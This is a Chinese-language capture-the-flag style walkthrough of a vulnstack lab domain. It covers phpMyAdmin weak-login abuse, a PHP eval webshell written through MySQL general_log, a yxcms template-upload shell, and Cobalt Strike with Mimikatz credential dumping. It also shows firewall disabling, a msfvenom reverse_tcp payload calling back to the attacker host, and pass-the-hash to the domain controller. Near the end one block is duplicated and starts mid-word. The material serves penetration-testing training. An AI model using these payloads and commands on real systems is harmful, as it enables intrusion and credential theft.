一、环境搭建

1.1 靶场拓扑图

1.2 靶场下载链接

靶场下载链接：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

1.3 虚拟机配置

VMnet3为内网网卡，VMnet8为外网网卡

ip配置:

kali (攻击机)：192.168.111.128 （VMnet8 网卡分配的IP） 

Windows 7 (web服务器):192.168.111.132（外网和kali连通）、192.168.52.143（内网ip）
Windows 2008 (域控):192.168.52.138 
Win2k3 (域内主机):192.168.52.141

1.3.1 Windows 7 (web服务器)

192.168.111.132（外网和kali连通）、192.168.52.143（内网ip）

在主机上访问win7，可以正常访问到PHP探针，配置完成

1.3.2 Windows 2008 (域控)

192.168.52.138 ，默认配置完成

1.3.3 Win2k3 (域内主机)

192.168.52.141，默认配置完成

二、外网打点突破

2.1 信息搜集

首先访问web服务器win7的模拟外网ip–192.168.111.132

在外网站点有一个MySQL数据库连接：

尝试弱口令：root/root，显示连接正常，但是没有利用点

对192.168.111.132进行端口扫描，目录扫描

访问：http://192.168.111.132/phpMyAdmin，使用刚检测到的弱口令：root/root进行登录


可以看到还有一个newyxcms数据库，对应会有一个网站

2.2 phpmyadmin 后台 Getshell

phpmyadmin后台getshell的常用手段有以下几种方式：（挨个尝试）

1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

2.2.1 尝试select into outfile直接写入

执行sql语句： show variables like '%secure%';

发现没有写入权限，无法用select into outfile方法写入shell。

2.2.2 尝试开启全局日志getshell

先执行命令：show variables like '%general%'; 查看日志状态：

当开启 general_log 时，所执行的 SQL 语句都会出现在datastu1.log 文件中。修改 general_log_file 的值为一个php文件，进而可 Getshell

开启 general_log 日志 SET GLOBAL general_log='on'

指定日志写入到网站根目录的1.php 文件

SET GLOBAL general_log_file='C:/phpStudy/www/1.php'

设置完成之后，写入webshell到1.php文件中

执行 SQL 语句：SELECT '<?php eval($_POST["cmd"]);?>'，即可将一句话木马写入 1.php 文件中

访问http://192.168.111.132/1.php 成功写入

使用蚁剑连接

连接成功

2.3 yxcms后台上传Getshell

在之前数据库中发现了yxcms的数据库，猜想会有yxcms网站，在拿下phpmyadmin后可以看到yxcms目录
访问/yxcms，在公告信息处，发现yxcms的后台登录路径以及用户名密码

登录成功！
登录到后台一般先找模板编辑的地方，然后写入一句话木马，直接getshell

刚好这里有模板文件，尝试新建或者在原有的模板文件中写入一句话木马，这里我选择新建一个模板文件中写入保存。

保存后，接下来就是找到写入文件1.php所在的路径，进行目录扫描

发现好多目录，这里我们发现这个cms存在目录遍历漏洞，根据phpmyadmin后台的地址也可以得到

连接成功！

三、内网搜集

我们在拿到的shell 执行 whoami 发现是administrator权限

3.1 靶机上线CS

在kali里 ./teamserver 192.168.111.128 root 运行cs服务

主机运行CS 客户端并连接 CS 服务端，配置好listener监听器之后，生成 exe后门程序

利用蚁剑 把生成的artifact.exe 上传到靶机上

在蚁剑终端里执行 artifact.exe 可以看到靶机上线到CS上

上线成功！

在CS客户端使用 Mimikatz 直接抓取本机用户密码：

这里抓取到密码之后，我们执行 net view 发现了域内另外俩台机器点击这里可以看到


可以利用抓取到的密码 psexec取login一下 监听器选 windows_smb/bind_pipe

可以看到域控的文件 我们可以进行上传文件操作，我们下面再看看其他方法 横向移动拿到域控和域内其他机器

3.2 内网信息搜集

接下来我们要做的就是信息收集，为之后的杀入内网做准备，

ipconfig /all   # 查看本机ip，所在域
route print     # 打印路由信息
arp -a          # 查看arp缓存
net start       # 查看开启了哪些服务
net share       # 查看开启了哪些共享
net share ipc$  # 开启ipc共享
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名（可能有多台）

1、先判断是否存在域，使用 shell ipconfig /all 查看 DNS 服务器，发现主 DNS 后缀不为空，存在域god.org

也可以执行命令net config workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息

2、上面发现 DNS 服务器名为 god.org，当前登录域为 GOD 再执行net view /domain查看有几个域(可能有多个)

3、查看域的组账户信息(工作组)

4、既然只有一个域，那就利用 net group “domain controllers” /domain 命令查看域控制器主机名，直接确认域控主机的名称为 OWA

5、确认域控主机的名称为 OWA 再执行 net view 查看局域网内其他主机信息（主机名称、IP地址）

扫描出来 除了域控OWA 之外，还有一台主机ROOT-TVI862UBEH

至此内网域信息收集完毕，已知信息：域控主机：192.168.52.138，同时还存在一台域成员主机：192.168.52.141，接下来的目标就是横向渗透拿下域控

3.3 rdp远程登陆win7

Win7跳板机 默认是不开启3389的，同时还有防火墙

#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

#关闭防火墙
netsh firewall set opmode disable   			#winsows server 2003 之前
netsh advfirewall set allprofiles state off 	#winsows server 2003 之后

这里我们以域用户 administrator登录。
输入我们刚从CS上 mimikatz dump下来的密码Hongrisec@2019

远程连接成功！

四、内网渗透

4.1 反弹win7的shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=1111 -f exe -o shell.exe #kali里生成msf后门文件 shell.exe

蚁剑上传到 win7上

kali里运行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.111.128
set lport 1111
exploit 

蚁剑运行 shell.exe 得到meterpreter

4.2 MSF简单利用

获得 MSF 的会话后即可使用 MSF 集成的诸多强大功能模块和脚本。简单演示下，如调用post/windows/gather/checkvm判断靶机是否属于虚拟机（检查是否进入了蜜罐）；

再如调用 post/windows/gather/enum_applications模块枚举列出安装在靶机上的应用程序；

4.3 添加路由

# 可以用模块自动添加路由
run post/multi/manage/autoroute
#添加一条路由
run autoroute -s 192.168.52.0/24
#查看路由添加情况
run autoroute -p

4.4 内网端口扫描

先执行background 命令将当前执行的 Meterpreter 会话切换到后台（后续也可执行sessions -i 重新返回会话），然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.141 开放的端口：

background
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389
run

得知：192.168.52.141 win2003域成员机开启了 135、139、445端口

同理扫描一下域控

域控开启了80、135、139、445端口

4.5 MSF进行ms17-010攻击(未成功)

4.5.1 msf扫描模块探测是否存在ms17-010漏洞

对于开启了 445 端口的 Windows 服务器肯定是要进行一波永恒之蓝扫描尝试的，借助 MSF 自带的漏洞扫描模块进行扫描：

search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
set rhosts 192.168.52.138
run

域控和成员机可能都存在ms17-010漏洞

4.5.2 漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp #内网环境，需要正向shell连接
set rhosts 192.168.52.138
run

利用失败

4.6 哈希传递攻击(PTH)拿下域控

上面既然通过永恒之蓝漏洞难以获得域控主机的 Shell，那就换一种攻击思路拿下域控吧，下面演示的是通过哈希传递攻击 PTH 拿下域控主机。

【哈希传递攻击】在 kerberos、NTLM 认证过程的关键，首先就是基于用户密码 Hash 的加密，所以在域渗透中，无法破解用户密码 Hash 的情况下，也可以直接利用 Hash 来完成认证，达到攻击的目的，这就是 hash 传递攻击（Pass The Hash，简称 PTH）。如果内网主机的本地管理员账户密码相同，那么可以通过 PTH 远程登录到任意一台主机，操作简单、威力无穷。

在域环境中，利用哈希传递攻击的渗透方式往往是这样的：

1. 获得一台域主机的权限，Dump 内存获得该主机的用户密码 Hash 值；
2. 通过哈希传递攻击尝试登录其他主机；
3. 继续搜集 Hash 并尝试远程登录，直到获得域管理员账户 Hash，登录域控，最终成功控制整个域。

下面使用 Metasploit/CS 来进行本靶场环境的进行 PTH 攻击演示：

4.6.1 CS哈希传递攻击利用

前面我们也有提到过，在win7 上线CS时，我们可以右键会话 ->执行 -> Run Mimikatz
直接借助 CS 进行用户哈希凭证窃取，详情见3.1

4.6.2 MSF哈希传递攻击

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.111.128
set lport 1111
exploit 
run windows/gather/smart_hashdump    #来进行hashdump

如果权限低，需要SYSTEM权限，可以直接getsystem 发现可以正常提权
提到SYSTEM权限之后再执行 run windows/gather/smart_hashdump

得到管理员的密码的hash

[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

但是这个只是用户密码的一个hash值，我们在msf里加载mimikatz模块
ps：ms6中 mimikatz模块已经合并为kiwi模块

load kiwi

creds_all  #列举所有凭据
creds_kerberos  #列举所有kerberos凭据
creds_msv  #列举所有msv凭据
creds_ssp  #列举所有ssp凭据
creds_tspkg  #列举所有tspkg凭据
creds_wdigest  #列举所有wdigest凭据
dcsync  #通过DCSync检索用户帐户信息
dcsync_ntlm  #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create  #创建黄金票据
kerberos_ticket_list  #列举kerberos票据
kerberos_ticket_purge  #清除kerberos票据
kerberos_ticket_use  #使用kerberos票据
kiwi_cmd  #执行mimikatz的命令，后面接mimikatz.exe的命令
lsa_dump_sam  #dump出lsa的SAM
lsa_dump_secrets  #dump出lsa的密文
password_change  #修改密码
wifi_list  #列出当前用户的wifi配置文件
wifi_list_shared  #列出共享wifi配置文件/编码

抓取用户hash

获得 NTLM Hash：4f1a2b2cf1dd79ae22a7f198412d7e51，在 Metasploit 中，经常使用于哈希传递攻击的模块有：

auxiliary/admin/smb/psexec_command   #在目标机器上执行系统命令
exploit/windows/smb/psexec           #用psexec执行系统命令
exploit/windows/smb/psexec_psh       #使用powershell作为payload

以exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008 为例：

use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser administrator
set smbpass 00000000000000000000000000000000:4f1a2b2cf1dd79ae22a7f198412d7e51
set smbdomain god
run

攻击失败

可以在CS里通过 PTH psexec成功拿下域控

min/smb/psexec_command   #在目标机器上执行系统命令
exploit/windows/smb/psexec           #用psexec执行系统命令
exploit/windows/smb/psexec_psh       #使用powershell作为payload

以exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008 为例：

use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser administrator
set smbpass 00000000000000000000000000000000:4f1a2b2cf1dd79ae22a7f198412d7e51
set smbdomain god
run

攻击失败

换一种方式：可以CS里通过 PTH psexec成功拿下域控

成功！